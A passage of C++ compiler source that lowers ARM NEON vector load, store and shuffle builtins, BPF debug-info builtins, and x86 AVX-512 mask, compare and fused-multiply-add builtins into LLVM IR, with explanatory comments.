Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld4");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v: {
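// Rotate the source pointer to the end so the operands match the ldNlane
// intrinsic signature (vectors..., lane index, pointer), then store the
// aggregate result through the sret pointer in Ops[0].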
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld2_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v: {
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateBitCast(Ops[3], Ty);
Ops[4] = Builder.CreateZExt(Ops[4], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld3_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v: {
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateBitCast(Ops[3], Ty);
Ops[4] = Builder.CreateBitCast(Ops[4], Ty);
Ops[5] = Builder.CreateZExt(Ops[5], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld4_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[2]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st2, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[3]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st2lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[3]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st3, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[4]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st3lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[4]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st4, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[4] = Builder.CreateZExt(Ops[4], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[5]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st4lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vtrn_v:
case NEON::BI__builtin_neon_vtrnq_v: {
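// vtrn transposes lane pairs: the first result interleaves the even lanes of
// both inputs, the second the odd lanes. E.g. for 4 elements the shuffle
// masks are {0,4,2,6} and {1,5,3,7}; the two results are stored to
// consecutive vectors at Ops[0].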
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back(i+vi);
Indices.push_back(i+e+vi);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vtrn");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vuzp_v:
case NEON::BI__builtin_neon_vuzpq_v: {
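// vuzp de-interleaves: the first result takes the even-indexed elements of
// the concatenated inputs, the second the odd-indexed ones. E.g. for 4
// elements the masks are {0,2,4,6} and {1,3,5,7}.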
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(2*i+vi);
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vuzp");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vzip_v:
case NEON::BI__builtin_neon_vzipq_v: {
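// vzip interleaves the low halves of the inputs into the first result and
// the high halves into the second. E.g. for 4 elements the masks are
// {0,4,1,5} and {2,6,3,7}.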
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back((i + vi*e) >> 1);
Indices.push_back(((i + vi*e) >> 1)+e);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vzip");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vqtbl1q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl1, Ty),
Ops, "vtbl1");
}
case NEON::BI__builtin_neon_vqtbl2q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl2, Ty),
Ops, "vtbl2");
}
case NEON::BI__builtin_neon_vqtbl3q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl3, Ty),
Ops, "vtbl3");
}
case NEON::BI__builtin_neon_vqtbl4q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl4, Ty),
Ops, "vtbl4");
}
case NEON::BI__builtin_neon_vqtbx1q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx1, Ty),
Ops, "vtbx1");
}
case NEON::BI__builtin_neon_vqtbx2q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx2, Ty),
Ops, "vtbx2");
}
case NEON::BI__builtin_neon_vqtbx3q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx3, Ty),
Ops, "vtbx3");
}
case NEON::BI__builtin_neon_vqtbx4q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx4, Ty),
Ops, "vtbx4");
}
case NEON::BI__builtin_neon_vsqadd_v:
case NEON::BI__builtin_neon_vsqaddq_v: {
Int = Intrinsic::aarch64_neon_usqadd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vsqadd");
}
case NEON::BI__builtin_neon_vuqadd_v:
case NEON::BI__builtin_neon_vuqaddq_v: {
Int = Intrinsic::aarch64_neon_suqadd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vuqadd");
}
}
}
Value *CodeGenFunction::EmitBPFBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
assert((BuiltinID == BPF::BI__builtin_preserve_field_info ||
BuiltinID == BPF::BI__builtin_btf_type_id ||
BuiltinID == BPF::BI__builtin_preserve_type_info ||
BuiltinID == BPF::BI__builtin_preserve_enum_value) &&
"unexpected BPF builtin");
// A sequence number, injected into IR builtin functions, to prevent CSE
// when the only difference between two calls may be the debuginfo metadata.
static uint32_t BuiltinSeqNum;
switch (BuiltinID) {
default:
llvm_unreachable("Unexpected BPF builtin");
case BPF::BI__builtin_preserve_field_info: {
const Expr *Arg = E->getArg(0);
bool IsBitField = Arg->IgnoreParens()->getObjectKind() == OK_BitField;
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(),
"using __builtin_preserve_field_info() without -g");
return IsBitField ? EmitLValue(Arg).getBitFieldPointer()
: EmitLValue(Arg).getPointer(*this);
}
// Enable underlying preserve_*_access_index() generation.
bool OldIsInPreservedAIRegion = IsInPreservedAIRegion;
IsInPreservedAIRegion = true;
Value *FieldAddr = IsBitField ? EmitLValue(Arg).getBitFieldPointer()
: EmitLValue(Arg).getPointer(*this);
IsInPreservedAIRegion = OldIsInPreservedAIRegion;
ConstantInt *C = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *InfoKind = ConstantInt::get(Int64Ty, C->getSExtValue());
// Build the IR for the preserve_field_info intrinsic.
llvm::Function *FnGetFieldInfo = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_field_info,
{FieldAddr->getType()});
return Builder.CreateCall(FnGetFieldInfo, {FieldAddr, InfoKind});
}
case BPF::BI__builtin_btf_type_id:
case BPF::BI__builtin_preserve_type_info: {
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin function without -g");
return nullptr;
}
const Expr *Arg0 = E->getArg(0);
llvm::DIType *DbgInfo = getDebugInfo()->getOrCreateStandaloneType(
Arg0->getType(), Arg0->getExprLoc());
ConstantInt *Flag = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *FlagValue = ConstantInt::get(Int64Ty, Flag->getSExtValue());
Value *SeqNumVal = ConstantInt::get(Int32Ty, BuiltinSeqNum++);
llvm::Function *FnDecl;
if (BuiltinID == BPF::BI__builtin_btf_type_id)
FnDecl = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_btf_type_id, {});
else
FnDecl = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_type_info, {});
CallInst *Fn = Builder.CreateCall(FnDecl, {SeqNumVal, FlagValue});
Fn->setMetadata(LLVMContext::MD_preserve_access_index, DbgInfo);
return Fn;
}
case BPF::BI__builtin_preserve_enum_value: {
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin function without -g");
return nullptr;
}
const Expr *Arg0 = E->getArg(0);
llvm::DIType *DbgInfo = getDebugInfo()->getOrCreateStandaloneType(
Arg0->getType(), Arg0->getExprLoc());
// Find enumerator
const auto *UO = cast<UnaryOperator>(Arg0->IgnoreParens());
const auto *CE = cast<CStyleCastExpr>(UO->getSubExpr());
const auto *DR = cast<DeclRefExpr>(CE->getSubExpr());
const auto *Enumerator = cast<EnumConstantDecl>(DR->getDecl());
auto &InitVal = Enumerator->getInitVal();
std::string InitValStr;
if (InitVal.isNegative() || InitVal > uint64_t(INT64_MAX))
InitValStr = std::to_string(InitVal.getSExtValue());
else
InitValStr = std::to_string(InitVal.getZExtValue());
std::string EnumStr = Enumerator->getNameAsString() + ":" + InitValStr;
Value *EnumStrVal = Builder.CreateGlobalStringPtr(EnumStr);
ConstantInt *Flag = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *FlagValue = ConstantInt::get(Int64Ty, Flag->getSExtValue());
Value *SeqNumVal = ConstantInt::get(Int32Ty, BuiltinSeqNum++);
llvm::Function *IntrinsicFn = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_enum_value, {});
CallInst *Fn =
Builder.CreateCall(IntrinsicFn, {SeqNumVal, EnumStrVal, FlagValue});
Fn->setMetadata(LLVMContext::MD_preserve_access_index, DbgInfo);
return Fn;
}
}
}
llvm::Value *CodeGenFunction::
BuildVector(ArrayRef<llvm::Value*> Ops) {
assert((Ops.size() & (Ops.size() - 1)) == 0 &&
"Not a power-of-two sized vector!");
bool AllConstants = true;
for (unsigned i = 0, e = Ops.size(); i != e && AllConstants; ++i)
AllConstants &= isa<Constant>(Ops[i]);
// If this is a constant vector, create a ConstantVector.
if (AllConstants) {
SmallVector<llvm::Constant*, 16> CstOps;
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
CstOps.push_back(cast<Constant>(Ops[i]));
return llvm::ConstantVector::get(CstOps);
}
// Otherwise, insertelement the values to build the vector.
Value *Result = llvm::UndefValue::get(
llvm::FixedVectorType::get(Ops[0]->getType(), Ops.size()));
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
Result = Builder.CreateInsertElement(Result, Ops[i], Builder.getInt32(i));
return Result;
}
// Convert the mask from an integer type to a vector of i1.
static Value *getMaskVecValue(CodeGenFunction &CGF, Value *Mask,
unsigned NumElts) {
auto *MaskTy = llvm::FixedVectorType::get(
CGF.Builder.getInt1Ty(),
cast<IntegerType>(Mask->getType())->getBitWidth());
Value *MaskVec = CGF.Builder.CreateBitCast(Mask, MaskTy);
// If we have fewer than 8 elements, the starting mask was an i8 and we
// need to extract down to the right number of elements.
if (NumElts < 8) {
int Indices[4];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
MaskVec = CGF.Builder.CreateShuffleVector(MaskVec, MaskVec,
makeArrayRef(Indices, NumElts),
"extract");
}
return MaskVec;
}
static Value *EmitX86MaskedStore(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Align Alignment) {
// Cast the pointer to the right type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2],
cast<llvm::FixedVectorType>(Ops[1]->getType())->getNumElements());
return CGF.Builder.CreateMaskedStore(Ops[1], Ptr, Alignment, MaskVec);
}
static Value *EmitX86MaskedLoad(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Align Alignment) {
// Cast the pointer to the right type.
llvm::Type *Ty = Ops[1]->getType();
Value *Ptr =
CGF.Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2], cast<llvm::FixedVectorType>(Ty)->getNumElements());
return CGF.Builder.CreateMaskedLoad(Ty, Ptr, Alignment, MaskVec, Ops[1]);
}
static Value *EmitX86ExpandLoad(CodeGenFunction &CGF,
ArrayRef<Value *> Ops) {
auto *ResultTy = cast<llvm::VectorType>(Ops[1]->getType());
llvm::Type *PtrTy = ResultTy->getElementType();
// Cast the pointer to the element type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(PtrTy));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2], cast<FixedVectorType>(ResultTy)->getNumElements());
llvm::Function *F = CGF.CGM.getIntrinsic(Intrinsic::masked_expandload,
ResultTy);
return CGF.Builder.CreateCall(F, { Ptr, MaskVec, Ops[1] });
}
static Value *EmitX86CompressExpand(CodeGenFunction &CGF,
ArrayRef<Value *> Ops,
bool IsCompress) {
auto *ResultTy = cast<llvm::FixedVectorType>(Ops[1]->getType());
Value *MaskVec = getMaskVecValue(CGF, Ops[2], ResultTy->getNumElements());
Intrinsic::ID IID = IsCompress ? Intrinsic::x86_avx512_mask_compress
: Intrinsic::x86_avx512_mask_expand;
llvm::Function *F = CGF.CGM.getIntrinsic(IID, ResultTy);
return CGF.Builder.CreateCall(F, { Ops[0], Ops[1], MaskVec });
}
static Value *EmitX86CompressStore(CodeGenFunction &CGF,
ArrayRef<Value *> Ops) {
auto *ResultTy = cast<llvm::FixedVectorType>(Ops[1]->getType());
llvm::Type *PtrTy = ResultTy->getElementType();
// Cast the pointer to the element type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(PtrTy));
Value *MaskVec = getMaskVecValue(CGF, Ops[2], ResultTy->getNumElements());
llvm::Function *F = CGF.CGM.getIntrinsic(Intrinsic::masked_compressstore,
ResultTy);
return CGF.Builder.CreateCall(F, { Ops[1], Ptr, MaskVec });
}
static Value *EmitX86MaskLogic(CodeGenFunction &CGF, Instruction::BinaryOps Opc,
ArrayRef<Value *> Ops,
bool InvertLHS = false) {
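// Lower the kand/kandn/kor/kxor-style mask builtins: bitcast the iN masks to
// <N x i1>, apply the binary operator (inverting the LHS for the "andn"
// forms), and bitcast the result back to iN.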
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(CGF, Ops[0], NumElts);
Value *RHS = getMaskVecValue(CGF, Ops[1], NumElts);
if (InvertLHS)
LHS = CGF.Builder.CreateNot(LHS);
return CGF.Builder.CreateBitCast(CGF.Builder.CreateBinOp(Opc, LHS, RHS),
Ops[0]->getType());
}
static Value *EmitX86FunnelShift(CodeGenFunction &CGF, Value *Op0, Value *Op1,
Value *Amt, bool IsRight) {
llvm::Type *Ty = Op0->getType();
// The amount may be a scalar immediate, in which case create a splat vector.
// Funnel shift amounts are taken modulo the bit width and the types are all
// power-of-2, so we only care about the lowest log2(bitwidth) bits anyway.
if (Amt->getType() != Ty) {
unsigned NumElts = cast<llvm::FixedVectorType>(Ty)->getNumElements();
Amt = CGF.Builder.CreateIntCast(Amt, Ty->getScalarType(), false);
Amt = CGF.Builder.CreateVectorSplat(NumElts, Amt);
}
unsigned IID = IsRight ? Intrinsic::fshr : Intrinsic::fshl;
Function *F = CGF.CGM.getIntrinsic(IID, Ty);
return CGF.Builder.CreateCall(F, {Op0, Op1, Amt});
}
static Value *EmitX86vpcom(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
bool IsSigned) {
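// XOP vpcom/vpcomu encode the predicate in the low 3 bits of the immediate;
// predicates 6 and 7 are constant FALSE/TRUE, the rest map onto ordinary
// integer comparisons whose result is sign-extended to the element width.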
Value *Op0 = Ops[0];
Value *Op1 = Ops[1];
llvm::Type *Ty = Op0->getType();
uint64_t Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
CmpInst::Predicate Pred;
switch (Imm) {
case 0x0:
Pred = IsSigned ? ICmpInst::ICMP_SLT : ICmpInst::ICMP_ULT;
break;
case 0x1:
Pred = IsSigned ? ICmpInst::ICMP_SLE : ICmpInst::ICMP_ULE;
break;
case 0x2:
Pred = IsSigned ? ICmpInst::ICMP_SGT : ICmpInst::ICMP_UGT;
break;
case 0x3:
Pred = IsSigned ? ICmpInst::ICMP_SGE : ICmpInst::ICMP_UGE;
break;
case 0x4:
Pred = ICmpInst::ICMP_EQ;
break;
case 0x5:
Pred = ICmpInst::ICMP_NE;
break;
case 0x6:
return llvm::Constant::getNullValue(Ty); // FALSE
case 0x7:
return llvm::Constant::getAllOnesValue(Ty); // TRUE
default:
llvm_unreachable("Unexpected XOP vpcom/vpcomu predicate");
}
Value *Cmp = CGF.Builder.CreateICmp(Pred, Op0, Op1);
Value *Res = CGF.Builder.CreateSExt(Cmp, Ty);
return Res;
}
static Value *EmitX86Select(CodeGenFunction &CGF,
Value *Mask, Value *Op0, Value *Op1) {
// If the mask is all ones, just return the first argument.
if (const auto *C = dyn_cast<Constant>(Mask))
if (C->isAllOnesValue())
return Op0;
Mask = getMaskVecValue(
CGF, Mask, cast<llvm::FixedVectorType>(Op0->getType())->getNumElements());
return CGF.Builder.CreateSelect(Mask, Op0, Op1);
}
static Value *EmitX86ScalarSelect(CodeGenFunction &CGF,
Value *Mask, Value *Op0, Value *Op1) {
// If the mask is all ones, just return the first argument.
if (const auto *C = dyn_cast<Constant>(Mask))
if (C->isAllOnesValue())
return Op0;
auto *MaskTy = llvm::FixedVectorType::get(
CGF.Builder.getInt1Ty(), Mask->getType()->getIntegerBitWidth());
Mask = CGF.Builder.CreateBitCast(Mask, MaskTy);
Mask = CGF.Builder.CreateExtractElement(Mask, (uint64_t)0);
return CGF.Builder.CreateSelect(Mask, Op0, Op1);
}
static Value *EmitX86MaskedCompareResult(CodeGenFunction &CGF, Value *Cmp,
unsigned NumElts, Value *MaskIn) {
if (MaskIn) {
const auto *C = dyn_cast<Constant>(MaskIn);
if (!C || !C->isAllOnesValue())
Cmp = CGF.Builder.CreateAnd(Cmp, getMaskVecValue(CGF, MaskIn, NumElts));
}
if (NumElts < 8) {
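// Pad sub-byte masks out to 8 elements; the extra lanes come from the zero
// vector, so the high bits of the resulting i8 are 0.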
int Indices[8];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
for (unsigned i = NumElts; i != 8; ++i)
Indices[i] = i % NumElts + NumElts;
Cmp = CGF.Builder.CreateShuffleVector(
Cmp, llvm::Constant::getNullValue(Cmp->getType()), Indices);
}
return CGF.Builder.CreateBitCast(Cmp,
IntegerType::get(CGF.getLLVMContext(),
std::max(NumElts, 8U)));
}
static Value *EmitX86MaskedCompare(CodeGenFunction &CGF, unsigned CC,
bool Signed, ArrayRef<Value *> Ops) {
assert((Ops.size() == 2 || Ops.size() == 4) &&
"Unexpected number of arguments");
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *Cmp;
if (CC == 3) {
Cmp = Constant::getNullValue(
llvm::FixedVectorType::get(CGF.Builder.getInt1Ty(), NumElts));
} else if (CC == 7) {
Cmp = Constant::getAllOnesValue(
llvm::FixedVectorType::get(CGF.Builder.getInt1Ty(), NumElts));
} else {
ICmpInst::Predicate Pred;
switch (CC) {
default: llvm_unreachable("Unknown condition code");
case 0: Pred = ICmpInst::ICMP_EQ; break;
case 1: Pred = Signed ? ICmpInst::ICMP_SLT : ICmpInst::ICMP_ULT; break;
case 2: Pred = Signed ? ICmpInst::ICMP_SLE : ICmpInst::ICMP_ULE; break;
case 4: Pred = ICmpInst::ICMP_NE; break;
case 5: Pred = Signed ? ICmpInst::ICMP_SGE : ICmpInst::ICMP_UGE; break;
case 6: Pred = Signed ? ICmpInst::ICMP_SGT : ICmpInst::ICMP_UGT; break;
}
Cmp = CGF.Builder.CreateICmp(Pred, Ops[0], Ops[1]);
}
Value *MaskIn = nullptr;
if (Ops.size() == 4)
MaskIn = Ops[3];
return EmitX86MaskedCompareResult(CGF, Cmp, NumElts, MaskIn);
}
static Value *EmitX86ConvertToMask(CodeGenFunction &CGF, Value *In) {
Value *Zero = Constant::getNullValue(In->getType());
return EmitX86MaskedCompare(CGF, 1, true, { In, Zero });
}
static Value *EmitX86ConvertIntToFp(CodeGenFunction &CGF, const CallExpr *E,
ArrayRef<Value *> Ops, bool IsSigned) {
unsigned Rnd = cast<llvm::ConstantInt>(Ops[3])->getZExtValue();
llvm::Type *Ty = Ops[1]->getType();
Value *Res;
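// Rnd == 4 is _MM_FROUND_CUR_DIRECTION (default rounding), for which a plain
// [su]itofp suffices; any other mode requires the AVX-512 rounding intrinsic.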
if (Rnd != 4) {
Intrinsic::ID IID = IsSigned ? Intrinsic::x86_avx512_sitofp_round
: Intrinsic::x86_avx512_uitofp_round;
Function *F = CGF.CGM.getIntrinsic(IID, { Ty, Ops[0]->getType() });
Res = CGF.Builder.CreateCall(F, { Ops[0], Ops[3] });
} else {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Res = IsSigned ? CGF.Builder.CreateSIToFP(Ops[0], Ty)
: CGF.Builder.CreateUIToFP(Ops[0], Ty);
}
return EmitX86Select(CGF, Ops[2], Res, Ops[1]);
}
// Lowers X86 FMA intrinsics to IR.
static Value *EmitX86FMAExpr(CodeGenFunction &CGF, const CallExpr *E,
ArrayRef<Value *> Ops, unsigned BuiltinID,
bool IsAddSub) {
bool Subtract = false;
Intrinsic::ID IID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
default: break;
case clang::X86::BI__builtin_ia32_vfmsubph512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddph512_mask3:
IID = llvm::Intrinsic::x86_avx512fp16_vfmadd_ph_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubaddph512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask3:
IID = llvm::Intrinsic::x86_avx512fp16_vfmaddsub_ph_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubps512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmadd_ps_512; break;
case clang::X86::BI__builtin_ia32_vfmsubpd512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmadd_pd_512; break;
case clang::X86::BI__builtin_ia32_vfmsubaddps512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmaddsub_ps_512;
break;
case clang::X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
Subtract = true;
LLVM_FALLTHROUGH;
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
IID = llvm::Intrinsic::x86_avx512_vfmaddsub_pd_512;
break;
}
Value *A = Ops[0];
Value *B = Ops[1];
Value *C = Ops[2];
if (Subtract)
C = CGF.Builder.CreateFNeg(C);
Value *Res;
// Use the target intrinsic when a rounding mode other than
// _MM_FROUND_CUR_DIRECTION (4) is requested, or for the addsub forms, which
// have no generic IR equivalent.
if (IID != Intrinsic::not_intrinsic &&
(cast<llvm::ConstantInt>(Ops.back())->getZExtValue() != (uint64_t)4 ||
IsAddSub)) {
Function *Intr = CGF.CGM.getIntrinsic(IID);
Res = CGF.Builder.CreateCall(Intr, {A, B, C, Ops.back() });
} else {
llvm::Type *Ty = A->getType();
Function *FMA;
if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
FMA = CGF.CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, Ty);
Res = CGF.Builder.CreateConstrainedFPCall(FMA, {A, B, C});
} else {
FMA = CGF.CGM.getIntrinsic(Intrinsic::fma, Ty);
Res = CGF.Builder.CreateCall(FMA, {A, B, C});
}
}
// Handle any required masking.
Value *MaskFalseVal = nullptr;
switch (BuiltinID) {
case clang::X86::BI__builtin_ia32_vfmaddph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask:
MaskFalseVal = Ops[0];
break;
